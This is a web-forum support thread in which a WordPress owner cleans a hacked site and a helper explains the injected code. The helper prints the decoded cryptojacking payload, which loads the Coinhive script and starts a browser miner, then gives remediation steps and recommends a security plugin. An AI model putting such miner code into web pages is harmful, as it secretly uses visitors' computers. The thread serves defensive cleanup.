Finally got hacked :( Oh no!!!

You may need to check in your database postmeta tables as well.

Ok cools, will do ??

FYI: I think the point of this particular script injection is to do cpu mining via Coinhive lol

Sounds too much for me lol!

The reason this particular malware code evades detection is because the payload is remotely loaded when a user browses the page/users browser compiles the page.

The compiled code looks something like:

<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script> var miner = new CoinHive.Anonymous('XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX', { throttle: 0.2 });miner.start();</script>

Which would most certainly be detected by malware scanners.

My point here is, you can rest assured at least that this infection did not install rogue code into the browsers and devices of people that visited your website, rather it just utilised their CPU to miner some cryptocurrency (probably Monero) while they were viewing a webpage.

Interesting. I’m still stuck removing all instances of that code, despite checking in wp_postmeta Check the linked image: it says there are no instances of that code yet I still see it in source for random pages?

If not in the database, it will be in one of your website files.

Found them, there’s lots of instances of it inside wp_posts

Now I just need to flex my php skills at removing them without breaking anything! Backing up the database first tho ??

Well done.

So in summary you have cleaned up the database, removed any extra rogue files added, reset the core WordPress files back to their original state, and reloaded a new set of plugins.

The one thing left was to identify how it was that this attack took place. Without knowing exactly what version of WordPress you upgraded from we cannot fully eliminate outdated code as the source of the problem.

Thanks man, yeah that’s a good summary of how it all went down.

My coding and skillsets are not enough to identify how it occurred in the first place so as long as I’ve taken the measurers recommended to me I’m hoping I will be safe from any future attacks ??

Feel free to trial my plugin (Pareto Security), set it to Advanced Mode, it may be able to catch the method the attackers use, therefore you can use that to prevent future attacks of the same kind.

Also nows the time to take a complete snapshot of your website and database, just in case.

Awesome man, I just installed it ??

Now, if I set to Advanced Mode will that have any odd issues with my eCommerce sales on these pages: https://www.bjwok.com/lightroomccpresets/lightroom-cc-presets-for-music-photographers/

I’ve had some instances of plugins somehow disabling outgoing email purchase receipts…

It will not interfere with outgoing email. But you could test it out as a guest user to make sure.

Ok, I’ll see how it goes. Thanks man.